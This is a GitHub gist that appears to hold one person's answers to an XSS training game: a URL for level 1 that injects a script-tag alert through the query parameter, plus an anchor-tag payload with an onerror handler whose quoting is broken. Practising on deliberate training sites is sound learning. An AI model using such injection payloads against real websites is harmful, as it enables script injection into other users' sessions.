Skip to content

Instantly share code, notes, and snippets.

Show Gist options
  • Save clemderome/5d7b2212ddbacf6f13af1ed7183d82e7 to your computer and use it in GitHub Desktop.
Save clemderome/5d7b2212ddbacf6f13af1ed7183d82e7 to your computer and use it in GitHub Desktop.
3.1 Basic attack XSS
1: https://xss-game.appspot.com/level1/frame?query=<script>+alert('alert')</script>
2: <a href='#' onerror="alert('alert');/>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment